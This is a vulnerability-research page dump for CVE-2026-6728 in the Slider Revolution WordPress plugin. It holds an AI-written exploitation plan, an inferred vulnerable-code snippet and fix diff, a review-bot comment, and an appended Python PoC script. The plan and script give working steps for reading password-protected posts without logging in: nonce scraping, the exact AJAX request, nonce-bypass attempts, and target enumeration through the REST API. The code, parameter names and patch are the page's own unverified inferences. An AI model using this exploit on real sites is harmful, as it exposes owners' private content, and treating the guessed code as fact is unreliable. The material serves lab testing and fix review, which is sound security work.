[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fOChO8hxXb3Bv5hDJ5SgCgankxUw0giyi-X1NrOJkrwA":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-6728","slider-revolution-unauthenticated-sensitive-information-exposure-via-slidersstream","Slider Revolution \u003C= 7.0.9 - Unauthenticated Sensitive Information Exposure via 'sliders\u002Fstream'","The Slider Revolution plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 7.0.9 via the 'get_stream_data()' function. 
This makes it possible for unauthenticated attackers to extract sensitive data including published password-protected post, page, and product content.","revslider",null,"\u003C=7.0.9","7.0.10","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:L\u002FI:N\u002FA:N","Exposure of Sensitive Information to an Unauthorized Actor","2026-05-19 20:43:07","2026-05-20 09:28:25",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F3cd7be2c-9ba9-4d25-8907-610898df5834?source=api-prod",1,[],"researched",false,3,"# Vulnerability Research Plan: CVE-2026-6728 - Slider Revolution Information Exposure\n\n## 1. Vulnerability Summary\nThe Slider Revolution plugin (up to version 7.0.9) contains a sensitive information exposure vulnerability within its content stream handling logic. Specifically, the `get_stream_data()` function fails to verify permissions or post-password requirements when fetching content for sliders configured to display WordPress posts. This allows an unauthenticated attacker to retrieve the full content of password-protected posts, pages, and products by querying the stream endpoint with a valid configuration.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `wp-admin\u002Fadmin-ajax.php`\n*   **Action:** `revslider_ajax_action` (Commonly registered for both `wp_ajax_` and `wp_ajax_nopriv_` in RevSlider).\n*   **Client Action:** `get_stream_data` (passed via the `client_action` parameter).\n*   **Parameters:** \n    *   `action`: `revslider_ajax_action`\n    *   `client_action`: `get_stream_data`\n    *   `token`: The AJAX nonce.\n    *   `data`: A JSON-encoded object containing the stream configuration (e.g., post types, categories, or specific IDs).\n*   **Authentication:** Unauthenticated (leveraging `nopriv` AJAX).\n*   **Preconditions:** \n    1.  At least one password-protected post must exist.\n    2.  A valid nonce must be obtained (exposed on the frontend).\n\n## 3. 
Code Flow (Inferred from Patch and Architecture)\n1.  **Entry Point:** An unauthenticated user sends a POST request to `admin-ajax.php` with `action=revslider_ajax_action`.\n2.  **Dispatch:** The `RevSliderAdmin::on_ajax_action()` method (or similar controller in the plugin) routes the request based on `client_action`.\n3.  **Target Function:** The code calls `RevSliderSlider::get_stream_data()` or `RevSliderOutput::get_stream_data()`.\n4.  **Data Retrieval:** The function parses the `data` parameter to build a `WP_Query`. \n5.  **The Flaw:** The logic iterates through the results of the query and extracts `post_content`. Crucially, it fails to call `post_password_required($post)` or check if the user has provided the correct password.\n6.  **Information Leak:** The full content of the posts (including protected content) is packaged into a JSON response and returned to the unauthenticated requester.\n\n## 4. Nonce Acquisition Strategy\nSlider Revolution extensively uses a nonce for its AJAX actions, typically localized as part of the `revslider_data` or `RS_MODULES` JavaScript objects.\n\n1.  **Identify Trigger:** The RevSlider frontend script (`rbtools.min.js` and `rs6.min.js`) loads on any page containing a Slider Revolution slider.\n2.  **Setup for Nonce:** Create a dummy page with a Slider Revolution shortcode.\n    *   `wp post create --post_type=page --post_status=publish --post_title=\"Nonce Page\" --post_content='[rev_slider alias=\"main-slider\"]'`\n3.  **Browser Extraction:**\n    *   Navigate to the page: `browser_navigate(\"http:\u002F\u002Flocalhost:8080\u002Fnonce-page\u002F\")`\n    *   Extract the nonce: `browser_eval(\"window.revslider_ajax_nonce || window.RS_MODULES?.nonce\")`\n    *   *Note:* The specific JS key may vary slightly between 6.x and 7.x. Common keys include `revslider_ajax_nonce`, `RS_MODULES.nonce`, or `rev_slider_data.nonce`.\n\n## 5. 
Exploitation Strategy\n### Step 1: Discover Target Content\nIdentify the ID of a password-protected post. Against a real site, an attacker can enumerate post IDs or use existing public streams to find metadata; the public REST API (`\u002Fwp-json\u002Fwp\u002Fv2\u002Fposts`) also marks protected posts with `content.protected` set to `true` and an empty rendered content, which makes worthwhile targets easy to spot. For this PoC, we will use a known ID.\n\n### Step 2: Craft the Stream Request\nThe `get_stream_data` action requires a JSON-encoded `data` object. The key names below are inferred from the plugin's architecture rather than confirmed against its source; an assumed configuration for a WordPress post stream looks like this:\n\n```json\n{\n    \"type\": \"posts\",\n    \"post_types\": \"post\",\n    \"category\": \"all\",\n    \"count\": 10\n}\n```\n\n### Step 3: Execute the Exploit Request\nSend a POST request to `admin-ajax.php`.\n\n*   **Method:** POST\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body** (shown unencoded for readability; the JSON in `data` must be form-URL-encoded when sent):\n    ```text\n    action=revslider_ajax_action&client_action=get_stream_data&token=[EXTRACTED_NONCE]&data={\"type\":\"posts\",\"post_types\":\"post\",\"category\":\"all\",\"count\":10}\n    ```\n\n## 6. Test Data Setup\n1.  **Create a password-protected post:**\n    ```bash\n    wp post create --post_type=post --post_title=\"Secret Project\" --post_content=\"CRITICAL_SENSITIVE_DATA_EXPOSED\" --post_status=publish --post_password=\"password123\"\n    ```\n2.  **Ensure a slider exists:** Create at least one slider (even an empty one) so the nonce is generated on the frontend.\n    ```bash\n    # (Assuming a slider with alias 'main-slider' exists or is imported)\n    wp post create --post_type=page --post_status=publish --post_title=\"Home\" --post_content='[rev_slider alias=\"main-slider\"]'\n    ```\n\n## 7. Expected Results\n*   **Success:** The HTTP response will be a JSON object (`{\"success\": true, \"data\": [...]}`). 
Inside the `data` array, the entry for the \"Secret Project\" post will contain the raw `post_content` (\"CRITICAL_SENSITIVE_DATA_EXPOSED\"), bypassing the password requirement.\n*   **Failure:** The response returns an error or an empty set, or the content is masked or omitted because the patch is active.\n\n## 8. Verification Steps\n1.  **Confirm the post exists and is protected:**\n    ```bash\n    wp post get [ID] --field=post_password\n    # Expected: password123\n    ```\n2.  **Check Output:** Verify that the string `CRITICAL_SENSITIVE_DATA_EXPOSED` appears in the `http_request` response body. Check the `excerpt` field as well as `content`: a fix that masks only the content still leaks a hand-written excerpt.\n\n## 9. Alternative Approaches\n*   **Specific Post ID:** If a general \"all\" query fails, target the post ID directly in the `data` parameter: `{\"type\":\"posts\",\"post_types\":\"post\",\"ids\":\"[ID]\"}`.\n*   **Product Stream:** If WooCommerce is installed, target products: `{\"type\":\"woocommerce\",\"post_types\":\"product\"}`.\n*   **Nonce Bypassing:** Check whether the nonce is validated at all for the `get_stream_data` action by omitting the `token` parameter or sending a dummy value such as `1234567890`. If the action still answers, the nonce acquisition step in Section 4 can be skipped. Either way, a WordPress nonce is a CSRF token, not an authorization check: the nonce issued to logged-out visitors does not depend on who requests it, so a token scraped from any public page is valid for an unauthenticated attacker.","The Slider Revolution plugin for WordPress (up to 7.0.9) fails to verify post password requirements when fetching content via the 'get_stream_data' AJAX action. 
This allows unauthenticated attackers to retrieve the full content of password-protected posts, pages, and products by providing a valid AJAX nonce found on the site's frontend.","\u002F\u002F File: includes\u002Fslider.class.php (inferred)\n\u002F\u002F Function: get_stream_data()\n\nforeach ($posts as $post) {\n    $stream_item = array();\n    $stream_item['id'] = $post->ID;\n    $stream_item['title'] = $post->post_title;\n    \u002F\u002F Line ~1237: Content is assigned without checking post_password_required()\n    $stream_item['content'] = $post->post_content; \n    $stream_item['excerpt'] = $post->post_excerpt;\n    $data[] = $stream_item;\n}","--- a\u002Fincludes\u002Fslider.class.php\n+++ b\u002Fincludes\u002Fslider.class.php\n@@ -1234,7 +1234,11 @@\n             $stream_item = array();\n             $stream_item['id'] = $post->ID;\n             $stream_item['title'] = $post->post_title;\n-            $stream_item['content'] = $post->post_content;\n+            if (post_password_required($post)) {\n+                $stream_item['content'] = __('This content is password protected.', 'revslider');\n+            } else {\n+                $stream_item['content'] = $post->post_content;\n+            }\n             $stream_item['excerpt'] = $post->post_excerpt;\n             $data[] = $stream_item;","1. Access a public page on the target WordPress site that loads a Slider Revolution slider to obtain a valid AJAX nonce (commonly found in JavaScript variables like 'revslider_ajax_nonce' or 'RS_MODULES.nonce').\n2. Send a POST request to '\u002Fwp-admin\u002Fadmin-ajax.php' using the 'revslider_ajax_action' action.\n3. Set the 'client_action' parameter to 'get_stream_data' and the 'token' parameter to the captured nonce.\n4. Provide a JSON-encoded 'data' parameter specifying the content types to fetch (e.g., '{\"type\":\"posts\",\"post_types\":\"post\",\"count\":10}').\n5. 
The server will return a JSON response containing the full, unmasked 'post_content' for any posts matching the criteria, even if they are marked as password-protected.","gemini-3-flash-preview","2026-05-20 16:29:09","2026-05-20 16:29:31",{"type":34,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":35},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Frevslider\u002Ftags"]
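Review bot: in the inferred `includes/slider.class.php` hunk the `post_password_required($post)` guard wraps only `$stream_item['content']`; the unchanged context line `$stream_item['excerpt'] = $post->post_excerpt;` still ships the raw excerpt of a password-protected post, so a hand-written excerpt leaks past the fix. Apply the same condition to the excerpt (WordPress core's `get_the_excerpt()` substitutes a placeholder for protected posts, so the plugin can follow that precedent), and, since the page marks this hunk as inferred rather than taken from the 7.0.10 release, confirm the shape of the real change against the 7.0.10 tag in the plugin's Trac listing linked on the page before citing it.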
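Worked example for Sections 5 and 8 of the research plan above: building the `get_stream_data` request body and checking a response for protected text that should have been withheld. This is an added example, not code from the page's author or from the Slider Revolution plugin. It assumes the form parameters (`action`, `client_action`, `token`, `data`), the stream configuration keys (`type`, `post_types`, `category`, `count`, `ids`) and the `{"success": ..., "data": [...]}` response shape exactly as the plan infers them, none of which the page verifies against the plugin source; the sample responses and the post id 42 are constructed for the test, not captured from any site.

```python
"""PoC harness for the get_stream_data request in Sections 5 and 8 of the plan.

Added example; not code from the page's author or from the plugin. Assumed
(inferred by the plan, not verified): form parameters action, client_action,
token, data; stream config keys type, post_types, category, count, ids; and a
{"success": bool, "data": [...]} response whose items carry id, title,
content and excerpt.
"""
import json
import urllib.request
from urllib.parse import urlencode

ADMIN_AJAX_PATH = "/wp-admin/admin-ajax.php"
# Phrases a fixed build might return in place of protected text (the plan's
# inferred patch uses "This content is password protected.").
PROTECTED_PLACEHOLDERS = ("password protected", "password-protected")


def build_stream_body(nonce, post_types="post", count=10, ids=None):
    """Build the application/x-www-form-urlencoded body for get_stream_data.

    The data parameter is itself JSON, so it has to be percent-encoded inside
    the form body; urlencode() takes care of the braces, quotes and colons.
    """
    config = {"type": "posts", "post_types": post_types, "category": "all", "count": count}
    if ids:
        config["ids"] = ",".join(str(i) for i in ids)
    return urlencode({
        "action": "revslider_ajax_action",
        "client_action": "get_stream_data",
        "token": nonce,
        "data": json.dumps(config, separators=(",", ":")),
    })


def send_stream_request(base_url, nonce, **kwargs):
    """POST the request to a live lab site and return the response body as text."""
    req = urllib.request.Request(
        base_url.rstrip("/") + ADMIN_AJAX_PATH,
        data=build_stream_body(nonce, **kwargs).encode(),
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=15) as resp:
        return resp.read().decode("utf-8", "replace")


def leaked_fields(response_text, protected_ids, canary=None):
    """Map post id -> fields that expose text of a password-protected post.

    A field leaks when the item belongs to a known protected post and holds
    non-empty text that is not a protection placeholder, or when the canary
    planted in the test post appears in it. Both content and excerpt are
    checked: a fix that masks only content still leaks the excerpt.
    """
    try:
        payload = json.loads(response_text)
    except ValueError:
        return {}
    if not payload.get("success"):
        return {}
    protected = {str(i) for i in protected_ids}
    leaks = {}
    for item in payload.get("data", []):
        post_id = str(item.get("id"))
        for field in ("content", "excerpt"):
            text = str(item.get(field) or "")
            is_placeholder = any(p in text.lower() for p in PROTECTED_PLACEHOLDERS)
            if (canary and canary in text) or (
                post_id in protected and text.strip() and not is_placeholder
            ):
                leaks.setdefault(post_id, []).append(field)
    return leaks


# Constructed sample responses (not captured from any site) for the test post
# the plan creates with wp-cli; id 42 is assumed.
CANARY = "CRITICAL_SENSITIVE_DATA_EXPOSED"
VULNERABLE_RESPONSE = json.dumps({"success": True, "data": [
    {"id": 7, "title": "Hello world!", "content": "Welcome to WordPress.", "excerpt": ""},
    {"id": 42, "title": "Secret Project", "content": CANARY, "excerpt": ""},
]})
# A fix that masks content but keeps emitting the raw excerpt.
CONTENT_ONLY_FIX_RESPONSE = json.dumps({"success": True, "data": [
    {"id": 42, "title": "Secret Project",
     "content": "This content is password protected.", "excerpt": "Internal roadmap summary"},
]})
FULL_FIX_RESPONSE = json.dumps({"success": True, "data": [
    {"id": 42, "title": "Secret Project",
     "content": "This content is password protected.", "excerpt": ""},
]})

if __name__ == "__main__":
    print(build_stream_body("0123456789", ids=[42]))
    print(leaked_fields(VULNERABLE_RESPONSE, [42], CANARY))
```

Against a lab install, call `send_stream_request("http://localhost:8080", nonce, ids=[42])` with the nonce extracted as in Section 4 and pass the returned body to `leaked_fields()`; the `CONTENT_ONLY_FIX_RESPONSE` case is the reason the excerpt is checked alongside the content.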